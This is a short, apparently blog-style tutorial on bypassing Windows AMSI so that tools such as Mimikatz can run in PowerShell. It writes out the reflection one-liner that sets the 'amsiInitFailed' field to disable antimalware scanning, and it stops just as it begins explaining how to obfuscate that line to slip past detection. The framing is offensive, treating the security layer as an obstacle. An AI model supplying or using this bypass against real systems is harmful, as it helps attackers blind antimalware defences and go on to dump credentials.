Amsi Bypass
What is AMSI? Antimalware Scan Interface probably makes your work harder by introducing additional security layer that scans scripts for malware signatures. For example, if we just wanted to run Mimikatz, we’d get annoying message like this:
The magic oneliner that originally worked looks like this:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) but if you paste it to powershell, it will get flagged by AMSI before execution:
so let’s come up with a simple AMSI bypass by obfuscating the oneliner, first, let’s do this: